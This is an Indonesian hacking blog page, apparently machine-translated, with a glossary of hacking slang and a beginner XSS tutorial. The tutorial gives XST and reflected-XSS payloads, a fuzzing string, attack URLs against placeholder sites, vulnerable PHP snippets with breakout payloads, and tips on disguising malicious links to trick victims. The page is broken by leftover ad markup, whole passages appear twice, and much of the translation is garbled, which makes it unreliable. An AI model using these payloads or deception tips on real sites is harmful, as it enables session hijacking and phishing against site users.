background-color: white; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">Mirror : Backup hasil deface. Newbie : Individu yang baru masuk ke dunia hacking. Shell : lihat Backdoor. Vuln : Kelemahan sebuah <span class="IL_AD" id="IL_AD6" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: white; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">website, seperti <span class="IL_AD" id="IL_AD7" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: white; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">SQL injection, LFI, RFI, dll. NB : Kalau ada yang ingin menambahkan index diatas, bisa PM saya ^.^ 
Thx ;)

Index Istilah Umum Hacking

Backdoor : File PHP yang diupload ke situs untuk meremote situs tersebut.Carder : Individu yang melakukan Carding.Carding : Kegiatan yang berhubungan dengan Credit Card/Kartu Kredit.Deface : Aksi meru…

15 May 2012

Tutorial XSS Injection (For Dummies)

___ -:: Pendahuluan:: - ____________ Apa itu XSS dan apa yang mengacu kepada? Alias XSS Cross Site <span class="IL_AD" id="IL_AD6" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: white; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">Scripting adalah sisi klien serangan di mana seorang penyerang menciptakan link jahat, <span class="IL_AD" id="IL_AD5" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: white; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">script berisi kode yang kemudian dilaksanakan dalam browser korban. Kode script bisa bahasa apapun yang didukung oleh browser, tetapi sebagian besar HTML dan <span class="IL_AD" id="IL_AD7" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: white; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">Javascript yang digunakan bersama dengan embedded Flash, Java atau ActiveX. Apa yang bisa Cross Site Scripting digunakan untuk? Cross Site Scripting dapat digunakan untuk berbagai hal, seperti sesi-pembajakan, browser serangan, phishing, propaganda dan bahkan cacing! Namun masih memerlukan korban untuk mengklik link jahat diciptakan oleh penyerang. Bagaimana bisa Satu mendapatkan korban untuk mengklik link XSS? Cara termudah untuk membuat orang meng-klik link berbahaya adalah untuk membuat mereka terlihat otentik dan non - jahat. Memberi mereka alasan kemudian adalah rekayasa sosial-bagian yang harus mudah kecuali jika korban sadar serangan tersebut dan / atau memiliki tindakan terhadap Cross Site Scripting, seperti NoScript. Bagaimana Satu menghindari XSS-links tampak mencurigakan? Hal ini biasanya dilakukan dengan penyandian, layanan url pendek, mengarahkan dan bahkan flash! Yang tipe Cross Site Scripting yang ada? Jenis yang paling umum adalah GET dan POST berbasis XSS. Namun Cross Site Scripting juga bisa dipicu melalui cookie. Beberapa individu mengklaim bahwa XSS juga dapat dibagi menjadi gigih dan non-persistent tetapi juga jenis-jenis dan harus disebut sebagai injeksi yang berbeda kelas bug / kerentanan. Apa perbedaan antara GET-POST-XSS? Perbedaannya adalah bahwa ketika GET-variabel yang digunakan adalah mungkin untuk melakukan serangan XSS normal mana penyerang mengirimkan crafted URL jahat kepada korban yang kemudian dijalankan ketika korban membuka link dalam browser. Dengan variabel POST-penyerang dapat f.ex. menggunakan flash untuk mengirim korban ke POST-XSS <span class="IL_AD" id="IL_AD8" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: white; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">situs rentan karena tidak mungkin untuk membuat URL ketika POST-variabel yang sedang digunakan. Apakah ada sub-kategori dari Cross Site Scripting? Pada saat ada XSSR dan XSSQLI. Orang bisa mengatakan bahwa XSRF / CSRF milik yang sama kategori, namun metode serangan terlalu banyak berbeda dari tradisional Cross Site Scripting. CSSR alias XSSR atau Cross Site Redirection Script digunakan untuk mengarahkan korban kepada halaman lain enggan. Halaman bisa misalnya berisi phishing template, kode serangan browser atau beberapa kasus di mana data atau skema URI javascript digunakan: sesi-pembajakan. XSSQLI adalah campuran Cross Site Scripting dan SQL Injection, di mana korban ketidaktahuan mengklik link berbahaya SQL Injection berisi instruksi untuk suatu daerah di website yang membutuhkan hak istimewa yang tamu atau anggota tidak memiliki. XSRF atau CSRF (kadang-kadang disebut sebagai C-Surf) berdiri untuk Cross Site Request Pemalsuan yang digunakan untuk mengirim masukan dari pihak ke-3 situs ke situs target. XSRF dapat dalam beberapa kasus dipicu hanya dengan melihat gambar yang dirancang khusus tetapi yang paling sering digunakan adalah URL. Dengan Cross Site Request Pemalsuan itu mungkin untuk f.ex. mengubah password korban jika situs target tidak diamankan dengan baik dengan bukti dll Apa itu XST dan dapat digunakan untuk apa saja? XST juga dikenal sebagai Cross Site (Script) Tracing adalah suatu cara untuk menyalahgunakan HTTP Trace (Debug) protokol. Apa pun yang seorang penyerang mengirimkan ke web-server yang telah diaktifkan akan mengirim TRACE jawaban yang sama kembali. Jika penyerang mengirimkan berikut: 
<div class="bbcode_container" data-iceapc="2" data-iceapw="14" style="-webkit-box-shadow: none !important; background-color: white; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 20px; margin-left: 20px; margin-right: 20px; margin-top: 5px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">
<div class="bbcode_description" data-iceapw="1" style="-webkit-box-shadow: none !important; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">
Code:</div>
<pre class="bbcode_code" data-iceapw="13" style="-webkit-box-shadow: none !important; background-attachment: initial; background-clip: initial; background-color: #f5f5f3; background-image: none; background-origin: initial; border-bottom-style: inset; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-style: inset; border-left-width: 1px; border-right-style: inset; border-right-width: 1px; border-top-style: inset; border-top-width: 1px; direction: ltr; font-size: 12px; height: 60px; line-height: 12px; overflow-x: scroll; overflow-y: scroll; padding-bottom: 6px; padding-left: 6px; padding-right: 6px; padding-top: 6px; text-align: left;">TRACE / HTTP/1.0
 Host: target.tld
 Custom-header: <script>alert(0)</script></pre>
</div>
Maka penyerang akan menerima sama "Custom-header: <scr ..." kembali memungkinkan eksekusi script. Namun setelah update browser terbaru tahun berikutnya (s) XST telah semakin sulit untuk DNS dan berfungsi dengan benar. Bagaimana mungkin menemukan bug XSS dalam website? Ada 2 metode: kode / script audit atau fuzzing yang digambarkan di bawah ini. Alat macam apa yang diperlukan untuk menemukan bug XSS? (REQ = Required, OPT = Optional) - REQ: Internet Browser (seperti FireFox) dalam kasus Anda fuzzing. - REQ:-penampil teks (seperti <span class="IL_AD" id="IL_AD10" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: white; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">notepad) dalam kasus Anda audit. - KPT: Sebuah proxy mencegat dalam kasus yang sedang Anda lakukan lebih maju XSS. (Dalam FireFox adalah mungkin untuk menggunakan Tamper Data). - KPT: Browser <span class="IL_AD" id="IL_AD4" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: white; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">Addons, untuk FireFox berikut ini adalah terutama bermanfaat: pembakar, JSView dan LiveHTTP Header. Apa lagi yang berguna untuk mengetahui apakah Kita ingin menemukan bug XSS? - Browser keterbatasan mengenai Cross Site Scripting [1] - HTTP Headers dan bagaimana protokol HTTP bekerja. - HTML + Javascript dan mungkin tertanam serangan script. (flash dll) - Mencegat proxy (Burp dll), alat diferensial (berbaur, ExamDiff, dll) - Useful browser-addons (lihat FireCat [3]) - Website scanner (Nikto, W3AF, Grendel, Directory-fuzzers dll) Mana-bug XSS biasanya terletak? Hal ini biasanya terletak di masukan pengguna yang diajukan baik melalui GET atau POST variabel, dimana hal itu tercermin pada situs target sebagai teks di luar tag, tag di dalam nilai-nilai atau dalam javascript. Dapat juga dalam beberapa kasus disampaikan melalui cookie, http header atau dalam kasus-kasus yang jarang <span class="IL_AD" id="IL_AD2" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: white; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">upload. Bagaimana Satu melindungi sebuah situs terhadap XSS? Cara terbaik adalah untuk memastikan bahwa semua pengguna input dan output divalidasi dengan benar. Namun dalam beberapa kasus WAF yang IPS atau juga dapat melindungi terhadap XSS meskipun masih cara terbaik untuk memvalidasi input pengguna-dan-output dengan benar. ___ -:: Menemukan Bug - Dengan Fuzzing:: - ____________ [EASY] Contoh Kasus - A: Kami berada di <a href="http://buggysite.tld/" style="-webkit-box-shadow: none !important; background-color: white; color: #bf3425; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-decoration: none;" target="_blank">http://buggysite.tld</a> di mana kita melihat "Cari-lapangan" di kanan atas. Karena kita tidak tahu kode sumber nyata tapi hanya HTML-output dari situs kita harus fuzz apa-apa mana mungkin untuk mengirimkan data. Dalam beberapa kasus, data akan tercermin di situs tersebut dan dalam beberapa kasus wont. Jika tidak kita beralih ke kue berikutnya, header, mendapatkan / post variabel atau apa pun yang kita fuzzing. Yang paling efektif untuk bulu adalah untuk tidak menulis: <script> <span class="IL_AD" id="IL_AD1" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: white; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">alert (0) </ script> karena banyak situs yang berbeda pencegahan terhadap Cross Site Scripting. Sebaliknya kita menciptakan string kustom yang dalam banyak kasus wont memicu apa pun yang bisa mengubah output dari kesalahan menjadikan situs atau halaman yang tidak rentan. Contoh string yang efektif yaitu: "kata kunci '/ \> < " '/ \> Dan <adalah yang paling umum digunakan html karakter yang digunakan dalam Cross Site Scripting. Namun, jika kita ingin menjadi benar-benar teliti maka kita dapat juga menambahkan )(][}{% ke string yang kita gunakan untuk fuzzsitus target. Alasan mengapa tidak ada dua "atau 'adalah karena hal ini dapat memicu WAF, IPS atau apa pun berjaga-jagasitus mungkin telah mencoba untuk melaksanakan terhadap XSS bukan menggunakan skema pengkodean yang aman / rencana / siklus pengembangan. Alasan mengapa semua karakter yang ditulis sebagai> <bukan <> adalah karena ini adalah bypass umum terhadap XSS-filter! Dengan pemikiran, kita menggunakan string berikut: "haxxor '/ \> <untuk fuzz medan pencarian: Mari kita melihat kembali HTML-code: <div class="bbcode_container" data-iceapc="22" data-iceapw="25" style="-webkit-box-shadow: none !important; background-color: white; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 20px; margin-left: 20px; margin-right: 20px; margin-top: 5px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">
<div class="bbcode_description" data-iceapw="1" style="-webkit-box-shadow: none !important; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">
<span class="IL_AD" id="IL_AD3" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: transparent !important; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">PHP Code:</div>
<div class="bbcode_code" data-iceapc="20" data-iceapw="24" style="-webkit-box-shadow: none !important; background-attachment: initial; background-clip: initial; background-color: #f5f5f3; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-style: inset; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-style: inset; border-left-width: 1px; border-right-style: inset; border-right-width: 1px; border-top-style: inset; border-top-width: 1px; direction: ltr; font-size: 12px; height: 60px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; overflow-x: scroll; overflow-y: scroll; padding-bottom: 6px; padding-left: 6px; padding-right: 6px; padding-top: 6px; text-align: left;">
<code data-iceapc="19" data-iceapw="24" style="-webkit-box-shadow: none !important; font-style: inherit; line-height: 12px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><code data-iceapc="18" data-iceapw="24" style="-webkit-box-shadow: none !important; font-style: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">    ...      <<span class="IL_AD" id="IL_AD11" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: transparent !important; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">input type="text" name="search" value="&quot;haxxor'/\&gt;&lt;" /> <br /> You searched for \"haxxor\'/\\>< which returned no results.      ...  </code></code></div>
</div>
Dalam kasus ini setelah tag string string disandikan dengan benar, namun di dalam string tag hanya punya beberapa ditambahkan garis miring yang tidak apa-apa dalam kasus ini. Pada dasarnya kita dapat melewati ini dengan mudah dengan: "> <script> alert (0) </ script> Jika kita akan menampilkan eksternal javascript kita harus menghindari penggunaan "dan" tentu saja. Terakhir kita XSS-url dapat: <a href="http://yetanothersite.tld/search.php?query" style="-webkit-box-shadow: none !important; background-color: white; color: #bf3425; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-decoration: none;" target="_blank">http://yetanothersite.tld/search.php?query</a> = "> <script> alert (0) </ script> jika GET-variabel yang digunakan. [Ringan] Contoh Kasus - C: Kami berada di <a href="http://prettysecure.tld/" style="-webkit-box-shadow: none !important; background-color: white; color: #bf3425; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-decoration: none;" target="_blank">http://prettysecure.tld</a> di mana kita menemukan kolom pencarian lain, sudah waktunya untuk mengirimkan string fuzzing kami. Berikut kode HTML-dikembalikan setelah string diajukan kami: <div class="bbcode_container" data-iceapc="45" data-iceapw="53" style="-webkit-box-shadow: none !important; background-color: white; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 20px; margin-left: 20px; margin-right: 20px; margin-top: 5px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">
<div class="bbcode_description" data-iceapw="2" style="-webkit-box-shadow: none !important; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">
PHP Code:</div>
<div class="bbcode_code" data-iceapc="43" data-iceapw="51" style="-webkit-box-shadow: none !important; background-attachment: initial; background-clip: initial; background-color: #f5f5f3; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-style: inset; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-style: inset; border-left-width: 1px; border-right-style: inset; border-right-width: 1px; border-top-style: inset; border-top-width: 1px; direction: ltr; font-size: 12px; height: 144px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; overflow-x: scroll; overflow-y: scroll; padding-bottom: 6px; padding-left: 6px; padding-right: 6px; padding-top: 6px; text-align: left;">
<code data-iceapc="42" data-iceapw="51" style="-webkit-box-shadow: none !important; font-style: inherit; line-height: 12px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><code data-iceapc="41" data-iceapw="51" style="-webkit-box-shadow: none !important; font-style: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">    ...      <input type="text" name="search" value="&quot;haxxor'/\&gt;&lt;"> You searched for "&quot;haxxor'/\&gt;&lt;" which returned no results.      ... (further down)      <script>      ...      s.prop1="prettysecure";      s.prop2="\"haxxor%39/\%3E%3C";      s.prop3="adspace";      ...      </script>  </code></code></div>
</div>
Dalam kasus ini setelah tag string string disandikan dengan benar, namun di dalam string tag hanya punya beberapa ditambahkan garis miring yang tidak apa-apa dalam kasus ini. Pada dasarnya kita dapat melewati ini dengan mudah dengan: "> <script> alert (0) </ script> Jika kita akan menampilkan eksternal javascript kita harus menghindari penggunaan "dan" tentu saja. Terakhir kita XSS-url dapat: <a href="http://yetanothersite.tld/search.php?query" style="-webkit-box-shadow: none !important; background-color: white; color: #bf3425; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-decoration: none;" target="_blank">http://yetanothersite.tld/search.php?query</a> = "> <script> alert (0) </ script> jika GET-variabel yang digunakan. [Ringan] Contoh Kasus - C: Kami berada di <a href="http://prettysecure.tld/" style="-webkit-box-shadow: none !important; background-color: white; color: #bf3425; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-decoration: none;" target="_blank">http://prettysecure.tld</a> di mana kita menemukan kolom pencarian lain, sudah waktunya untuk mengirimkan string fuzzing kami. Berikut kode HTML-dikembalikan setelah string diajukan kami: <div class="bbcode_container" data-iceapc="20" data-iceapw="23" style="-webkit-box-shadow: none !important; background-color: white; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 20px; margin-left: 20px; margin-right: 20px; margin-top: 5px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">
<div class="bbcode_description" data-iceapw="2" style="-webkit-box-shadow: none !important; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">
PHP Code:</div>
<div class="bbcode_code" data-iceapc="18" data-iceapw="21" style="-webkit-box-shadow: none !important; background-attachment: initial; background-clip: initial; background-color: #f5f5f3; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-style: inset; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-style: inset; border-left-width: 1px; border-right-style: inset; border-right-width: 1px; border-top-style: inset; border-top-width: 1px; direction: ltr; font-size: 12px; height: 96px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; overflow-x: scroll; overflow-y: scroll; padding-bottom: 6px; padding-left: 6px; padding-right: 6px; padding-top: 6px; text-align: left;">
<code data-iceapc="17" data-iceapw="21" style="-webkit-box-shadow: none !important; font-style: inherit; line-height: 12px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><code data-iceapc="16" data-iceapw="21" style="-webkit-box-shadow: none !important; font-style: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">    ...      if($_GET['view_profile']==1) {      echo $_GET['name'];      ... (more code)      }      ...  </code></code></div>
</div>
Dengan melihat kode diatas kita dapat melihat bahwa jika view_profile adalah sama dengan 1 maka skrip akan mencetak "nama" variabel. Contoh URL serangan bisa terlihat seperti: <a href="http://testz.tld/index.php?view_profile=1&name" style="-webkit-box-shadow: none !important; background-color: white; color: #bf3425; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-decoration: none;" target="_blank">http://testz.tld/index.php?view_profile=1&name</a> = <script> alert (0) </ script> [KERAS] Contoh Kasus - B: File berikut (search.php) memiliki beberapa kode yang menarik: <div class="bbcode_container" data-iceapc="26" data-iceapw="30" style="-webkit-box-shadow: none !important; background-color: white; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 20px; margin-left: 20px; margin-right: 20px; margin-top: 5px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">
<div class="bbcode_description" data-iceapw="2" style="-webkit-box-shadow: none !important; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">
PHP Code:</div>
<div class="bbcode_code" data-iceapc="24" data-iceapw="28" style="-webkit-box-shadow: none !important; background-attachment: initial; background-clip: initial; background-color: #f5f5f3; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-style: inset; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-style: inset; border-left-width: 1px; border-right-style: inset; border-right-width: 1px; border-top-style: inset; border-top-width: 1px; direction: ltr; font-size: 12px; height: 96px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; overflow-x: scroll; overflow-y: scroll; padding-bottom: 6px; padding-left: 6px; padding-right: 6px; padding-top: 6px; text-align: left;">
<code data-iceapc="23" data-iceapw="28" style="-webkit-box-shadow: none !important; font-style: inherit; line-height: 12px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><code data-iceapc="22" data-iceapw="28" style="-webkit-box-shadow: none !important; font-style: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">    ...      if($_GET['set_flag']==1) {      $var = "checked";      }      echo "<input type='radio' value='flag' checked='" .htmlentities($var). "' />";      ...  </code></code></div>
</div>
Ini adalah kerentanan bersyarat di mana dalam php.ini register_globals harus diatur ke Aktif. (Off factory default). Register_globals pada dasarnya memungkinkan seorang individu untuk mengatur variabel dengan cepat, bahkan jika mereka tidak dimaksudkan untuk ditetapkan. Hal ini hanya berlaku untuk variabel yang TIDAK ditetapkan seperti dalam contoh di atas. Masalah lain yang kami temui htmlentities Namun adalah karena kesalahan coding, kita masih bisa menyalahgunakan tag tanpa membuat yang baru. Kita perlu menggunakan event handler dalam tag <input> dan beberapa CSS (Cascading Style Sheet) untuk memastikan bahwa memicu korban tidak peduli apa eventhandler. Ada beberapa cara untuk melakukan itu, salah satunya adalah: <div class="bbcode_container" data-iceapc="2" data-iceapw="2" style="-webkit-box-shadow: none !important; background-color: white; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 20px; margin-left: 20px; margin-right: 20px; margin-top: 5px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">
<div class="bbcode_description" data-iceapw="1" style="-webkit-box-shadow: none !important; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">
Code:</div>
<pre class="bbcode_code" data-iceapw="1" style="-webkit-box-shadow: none !important; background-attachment: initial; background-clip: initial; background-color: #f5f5f3; background-image: none; background-origin: initial; border-bottom-style: inset; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-style: inset; border-left-width: 1px; border-right-style: inset; border-right-width: 1px; border-top-style: inset; border-top-width: 1px; direction: ltr; font-size: 12px; height: 36px; line-height: 12px; overflow-x: scroll; overflow-y: scroll; padding-bottom: 6px; padding-left: 6px; padding-right: 6px; padding-top: 6px; text-align: left;"> style='display:block;width:99999px;height:99999px;'</pre>
</div>
Sebuah eventhandler yang dapat kita gunakan dalam kasus ini bisa onmouseover, onblur meskipun mungkin lebih baik. Anda mungkin bertanya pada diri sendiri, mengapa script di atas tidak aman? Karena htmlentities () digunakan dengan cara yang tidak aman, karena bahwa tag terlihat seperti ini dalam bentuk html: <input type='radio' value='flag' checked='$var' /> Di dalam nilai memeriksa variabel kami ($ var) dikodekan, tetapi hanya "> dan <yang disandikan, bukan 'karena ENT_QUOTES tidak diatur dalam fungsi htmlentities. Ini berarti bahwa kita dapat melepaskan diri dari checked =''dengan mudah. Contoh serangan bisa URL: <a href="http://was-secure.tld/search.php?test" style="-webkit-box-shadow: none !important; background-color: white; color: #bf3425; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-decoration: none;" target="_blank">http://was-secure.tld/search.php?test</a> = 'style =' display: block; width: 99999px; height: 99999px; 'onmouseover =' alert (0) Tidak ada "Contoh Kasus - C" karena saya telah melalui sebagian besar penting Cross Site Scripting. ___ -:: Tambahan Informasi:: - ____________ XSSR Ketika itu adalah mungkin untuk mengirim pengguna ke data atau skema URI javascript baik melalui A) GET atau POST-variabel atau B) Pengguna disampaikan konten seperti link maka berlaku untuk kategori XSSR bug. Namun beberapa individu telah menyatakan bahwa situs yang hanya menerima HTTP atau HTTPS GET-link melalui variabel juga jatuh di bawah kategori XSSR. Sebuah contoh dapat XSSR: <a href="http://somesite.tld/redirect.php?link=data:text/html" style="-webkit-box-shadow: none !important; background-color: white; color: #bf3425; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-decoration: none;" 